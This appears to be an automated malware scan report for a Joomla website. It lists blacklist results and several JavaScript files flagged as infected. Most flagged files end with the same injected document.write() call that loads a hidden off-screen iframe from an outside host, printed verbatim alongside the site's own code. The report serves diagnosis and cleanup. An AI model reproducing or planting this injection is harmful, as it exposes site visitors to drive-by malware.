Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wellsborocrossroadsfwc.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wellsborocrossroadsfwc.com/
Result: Yandex has marked this website as suspicious; visiting it may harm your computer.
Details are available here.
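Scanned pages/files
Note: in every file flagged as malicious below, the excerpt shows the site's own script (in some files packed with an eval-based packer) followed by the same appended document.write() call. That trailing call inserts a 500x500 iframe positioned off-screen (left:-550px) that loads from soznpa.dns-stuff[.]com, and it is the injected part. The identical statement at the end of unrelated extension and template files suggests the files were modified on the server, so cleanup means restoring each flagged file from a known-good copy rather than editing one script.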
Request | Server response | Status |
http://wellsborocrossroadsfwc.com/ | 200 OK Content-Length: 24081 Content-Type: text/html | clean |
http://wellsborocrossroadsfwc.com/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://wellsborocrossroadsfwc.com/plugins/system/rokbox/rokbox.js | 200 OK Content-Length: 22232 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('V.6f({\'2K\':D(){L 8.1D(\'2C\',\'\')},\'1U\':D(){L 8.1D(\'2C\',\'3C\')}});8A.6f({\'8v\':D(){l 6i=/^(25|6h):\\/\\/([a-z-.0-9]+)[\\/]{0,1}/i.4S(I.35);l 1x=/^(25|6h):\ ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://soznpa.dns-stuff.com/4038.zKHpCU2?14" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://wellsborocrossroadsfwc.com/plugins/system/rokbox/themes/light/rokbox-config.js | 200 OK Content-Length: 2753 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var rokbox; window.addEvent('domready', function() { rokbox = new RokBox({ 'theme': 'light', 'transition': Fx.Transitions.Quad.easeOut, 'duration': 400, 'chase': 50, 'frame-border': 20, 'content-padding': 0, 'arrows-height': 35, 'effect': 'growl', 'captions': 1, 'captionsDelay': 800, 'scrolling': 0, 'keyEvents': 1, 'overlay': { 'background': '#000', 'opacity': 0.2, 'duration': 200, 'transition': Fx.Transitions.Quad.easeInOut }, 'defaultSize': { 'width': 640, 'height': 460 }, 'autoplay': 'true', 'controller': 'true', 'bgcolor': '#ffffff', 'youtubeAutoplay': 0, 'vimeoColor': '00adef', 'vimeoPortrait': 0, 'vimeoTitle': 0, 'vimeoFullScreen': 1, 'vimeoByline': 0 }); });document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://soznpa.dns-stuff.com/4038.zKHpCU2?14" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://wellsborocrossroadsfwc.com/modules/mod_roknavmenu/themes/fusion/js/fusion.js | 200 OK Content-Length: 11390 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('p 2R=Q 2Q({3r:1.4,3:{13:{x:0,y:0},O:{x:0,y:0},T:27,h:{x:\'D\',y:\'1f\'},A:\'I 18 S\',R:\'X\',k:1,3b:3B,14:{W:3A,U:1h.3h.3w.3k},1d:{W:3y,U:1h.3h.3D.3k}},2P:7(Y,3){2. ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://soznpa.dns-stuff.com/4038.zKHpCU2?14" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://wellsborocrossroadsfwc.com/templates/rt_infuse_j15/js/rokfonts.js | 200 OK Content-Length: 906 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var RokBuildSpans=function(g,j,k){(g.length).times(function(i){var e="."+g[i];var f=function(a){a.setStyle('visibility','visible');var b=a.getText();var c=b.split(" ");first=c[0];rest=c.slice(1).join(" ");html=a.innerHTML;if(rest.length>0){var d=a.clone().setText(' '+rest),span=new Element('span').setText(first);span.inject(d,'top');a.replaceWith(d)}};$$(e).each(function(c){j.each(function(h){c.getElements(h).each(function(b){var a=b.getFirst();if(a&&a.getTag()=='a')f(a);else f(b)})})})})}; ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://soznpa.dns-stuff.com/4038.zKHpCU2?14" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://wellsborocrossroadsfwc.com/templates/rt_infuse_j15/js/rokutils.js | 200 OK Content-Length: 3516 Content-Type: application/javascript | clean |
http://wellsborocrossroadsfwc.com/templates/rt_infuse_j15/js/rokutils.inputs.js | 200 OK Content-Length: 2717 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var InputsExclusion = ['.content_vote']; eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('a 7={15:1.5,10:9(){7.8=16 14({\'D\':[]});a 8=$$(\'o[2=0]\');a x=$$(O.L(\' o[2=0], \')+\' o[2=0]\');x.r(9(y){8=8.R(y)}); ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://soznpa.dns-stuff.com/4038.zKHpCU2?14" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://wellsborocrossroadsfwc.com/modules/mod_briaskISS/mod_briaskISS.js | 200 OK Content-Length: 3674 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function briaskISS(idModule, random, picInterval, transDelay, picArray) { this.picRandom = random; this.picInterval = picInterval; this.transDelay = transDelay; this.picArray = picArray; this.curPic = 0; this.nextPic = 0; this.numPics = 0; this.curOpacity = 99 this.nextOpacity = 0; this.idModule = idModule; this.initISS(); } briaskISS.prototype.initISS=function() { if (!docum setTimeout("briaskInstance"+this.idModule+".issTransition()", this.transDelay); } else { this.picArray[0][this.curPic].style.display = "none"; this.curPic = this.nextPic; setTimeout("briaskInstance"+this.idModule+".issShow()", this.picInterval); } } ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://soznpa.dns-stuff.com/4038.zKHpCU2?14" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://wellsborocrossroadsfwc.com/modules/mod_rokajaxsearch/js/rokajaxsearch.js | 404 Not Found Content-Length: 552 Content-Type: text/html | clean |
http://wellsborocrossroadsfwc.com/test404page.js | 404 Not Found Content-Length: 521 Content-Type: text/html | clean |
http://wellsborocrossroadsfwc.com/plugins/content/s5_mp3_player/s5_mp3_player.js | 200 OK Content-Length: 867 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var arMP3Players = new Array(); var bMP3PlayerStarted = false; function registerMP3Player(playerID,autostart){ arMP3Players.push(playerID); if(autostart == "1" && !bMP3PlayerStarted){ bMP3PlayerStarted = true; setTimeout("document.getElementById('"+playerID+"').autostart()",100); } } function stopMP3Players(playerID){ for(i=0;i<arMP3Players.length;i++){ if(playerID != arMP3Players[i]){ document.getElementById(arMP3Players[i]).stopPlayer(); } } } ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://soznpa.dns-stuff.com/4038.zKHpCU2?14" height="500" width="500"></iframe>'); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wellsborocrossroadsfwc.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Wed, 01 Oct 2014 16:20:45 GMT
Pragma: no-cache
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0e DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 01 Oct 2014 16:20:45 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 169e4c54fa01e6596b976a12b26a21a8=52e94973c262adfb4ffc309e5df76cdf; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: wellsborocrossroadsfwc.com
Referer: http://www.google.com/search?q=wellsborocrossroadsfwc.com
Result:
The response matches the first query; no suspicious redirects were found. Only the Referer header was varied in this check, so it does not cover the iframe injected through the script files listed under "Scanned pages/files", nor redirects conditioned on other request properties such as the User-Agent.